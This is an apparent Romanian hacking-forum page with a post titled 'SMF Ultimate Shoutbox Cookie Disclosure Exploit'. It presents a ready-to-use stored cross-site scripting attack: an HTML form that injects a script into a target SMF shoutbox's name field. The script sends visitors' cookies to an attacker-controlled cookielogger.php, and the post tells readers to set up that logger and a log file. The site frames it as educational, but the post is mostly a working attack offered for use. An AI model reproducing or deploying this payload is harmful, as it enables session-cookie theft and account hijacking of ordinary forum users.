HackStuff...
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe , tutoriale etc. In acelasi timp veti avea si asistenta help . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile savarsite.ENJoY --- by andreony ---
Lista Forumurilor Pe Tematici
HackStuff... | Reguli | Inregistrare | Login

POZE HACKSTUFF...

Nu sunteti logat.
Nou pe simpatie:
Naty777 din Bucuresti
Femeie
19 ani
Bucuresti
cauta Barbat
30 - 60 ani
HackStuff... / Hacking! / SMF Ultimate Shoutbox Cookie Disclosure Exploit Moderat de lFx
Autor
Mesaj Pagini: 1
DS
Junior

Inregistrat: acum 18 ani
Postari: 38
This is your basic shoutbox.  Your registers users type in a message and click shout.  Guests on your
site (if you give them access to the block) will type in their name, email address and message before
clicking shout.

The format of each 'shout' is Date, Name, Message.  If a registered user posts a shout, their name
becomes a link to their profile.  If a guest posts a shout, their name is a mailto: to the email
address they entered.

Vulnerabilities:

----------------------------------------

Create an html file :


<center>
<form action="http://WWW.TARGET.COM/index.php?action=shout" method="post">
<input value="http://WWW.TARGET.COM/index.php?" name="qstr" type="hidden">
<input value="" name="email" type="hidden">
<input value=" <SCRIPT>location.href='http://WWW.YOURSITE.COM/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>" name="displayname" type="hidden">
<input value="[HERE MEMBERID EXAMPLE: 2]" name="memberID" type="hidden">
<input value="Message" name="message" size="16" maxlength="300" onfocus="if (this.value == 'Message')this.value=''" type="text"><br>
<input name="submit" value="Shout" type="submit">
</form>
</center>

-----------------------------------------------

Create the page cookielogger.php & logfile.txt

-----------------------------------------------

smf ultimate shoutbox cookie disclosure exploit this your basic your registers users type message

13.9KB


_______________________________________
Only One Road!

pus acum 18 ani
   
Pagini: 1  

Mergi la